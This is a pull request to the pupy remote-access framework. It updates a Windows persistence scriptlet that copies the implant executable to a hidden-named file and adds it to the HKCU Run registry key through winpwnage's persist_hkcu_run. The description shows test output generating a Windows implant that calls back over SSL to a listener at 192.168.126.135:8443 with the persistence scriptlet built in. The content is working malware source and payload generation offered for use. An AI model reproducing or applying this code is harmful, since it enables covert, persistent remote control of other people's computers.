### PR TITLE
Fix scriptlets persistence function

### DIFF
--- a/pupy/scriptlets/persistence.py
+++ b/pupy/scriptlets/persistence.py
@@ -3,7 +3,7 @@
 ''' Execute persistence command '''
 
 __dependencies__ = {
-    'windows': ['pupwinutils.persistence'],
+    'windows': ['winpwnage.core', 'winpwnage.functions.persist'],
 }
 
 __arguments__ = {
@@ -23,7 +23,8 @@ from tempfile import gettempdir
 from uuid import getnode
 from hashlib import md5
 
-from pupwinutils.persistence import add_registry_startup
+from winpwnage.functions.persist import persist_hkcu_run
+
 
 def main(src=None, directory=None, filename=None, args=None, regkey=None, logger=None, pupy=None):
     if not directory:
@@ -33,10 +34,10 @@ def main(src=None, directory=None, filename=None, args=None, regkey=None, logger
         directory = path.expandvars(directory)
 
     mid = md5('node={} cid={}'.format(
-            getnode(), pupy.cid)).hexdigest()
+        getnode(), pupy.cid)).hexdigest()
 
     if not filename:
-        filename = mid[:8]+'.exe'
+        filename = mid[:8] + '.exe'
 
     if not src:
         src = sys.executable
@@ -59,5 +60,5 @@ def main(src=None, directory=None, filename=None, args=None, regkey=None, logger
         logger.debug('Copy: {} -> {}'.format(src, filepath))
         copy(src, filepath)
 
-    if not add_registry_startup(cmd, regkey):
-        logger.error('add_registry_startup failed')
+    if not persist_hkcu_run(cmd, regkey):
+        logger.error('persist hkcu run failed')


### PR DESCRIPTION
Fix scriptlets persistence function, the original feature is deprecated in the new version.
`from pupwinutils.persistence import add_registry_startup`  to
`from winpwnage.functions.persist import persist_hkcu_run`

Test:
```
>> gen -s persistence 
[%] Raw user arguments given for generation: []
[%] This local listening point will be used: Transport=ssl Address=192.168.126.135:8443
[%] Host & port for listening point are set to: 192.168.126.135:8443
[%] Transport method 'ssl' appended to launcher args
[%] Host & port '192.168.126.135:8443' appended to launcher args
[+] loading scriptlet 'persistence'
[+] Generate client: windows/x86
{ Configuration }
KEY             VALUE                               
----------------------------------------------------
launcher        connect                             
launcher_args   -t ssl --host 192.168.126.135:8443  
cid             1223467965                          
offline_script  PRESENT                             

[+] Required credentials (found)
  + SSL_BIND_CERT
  + SSL_CA_CERT
  + SSL_CLIENT_CERT
  + SSL_BIND_KEY
  + SSL_CLIENT_KEY
[+] OUTPUT_PATH: /data/github/pupy/config/pupy/output/pupyx86.91wJyz.exe
[+] SCRIPTLETS:  ['persistence']
[+] DEBUG:       False

```
